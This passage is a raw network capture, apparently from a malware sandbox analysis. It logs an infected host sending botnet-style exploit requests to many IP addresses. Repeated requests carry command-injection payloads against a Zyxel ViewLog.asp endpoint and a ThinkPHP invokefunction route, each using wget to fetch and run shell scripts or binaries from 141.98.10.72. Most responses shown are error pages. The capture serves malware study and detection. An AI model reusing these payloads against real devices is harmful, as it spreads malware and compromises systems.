6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {

Session ID	Source IP	Source Port	Destination IP	Destination Port
398	192.168.2.15	53448	31.136.127.36	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.883192062 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:48.569672108 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:49.913549900 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:52.665457010 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:58.041317940 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:08.792967081 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:31.064588070 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:14.071403027 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
399	192.168.2.15	35554	94.26.7.149	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.909037113 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:48.160341024 CET	109	IN	HTTP/1.1 302 Found Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
400	192.168.2.15	43182	94.120.236.191	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:47.942490101 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
401	192.168.2.15	39686	112.177.57.8	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:48.325813055 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:48.612648964 CET	506	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Wed, 14 Feb 2024 08:29:47 GMT Server: httpd Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
402	192.168.2.15	40938	112.222.35.158	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:48.338598967 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:48.639293909 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:29:48 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
403	192.168.2.15	45590	112.132.215.153	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:48.351281881 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:48.663229942 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:31:32 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
404	192.168.2.15	46576	112.192.19.97	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:48.420063019 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
405	192.168.2.15	59498	112.197.81.187	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:48.436887026 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:48.840914011 CET	339	IN	HTTP/1.0 400 Bad Request Date: Wed, 14 Feb 2024 15:29:48 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
406	192.168.2.15	39916	95.177.14.245	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.427334070 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:50.630389929 CET	659	IN	HTTP/1.0 404 Not Found !!! Pragma: no-cache Content-type: text/html <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html> Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
407	192.168.2.15	50588	31.136.63.48	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.427473068 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:51.065562010 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:52.313477039 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:54.969425917 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:00.089227915 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:10.072951078 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:31.064503908 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:12.023142099 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
408	192.168.2.15	50152	62.48.200.217	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:50.439281940 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:50.653127909 CET	495	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:49 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 288 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 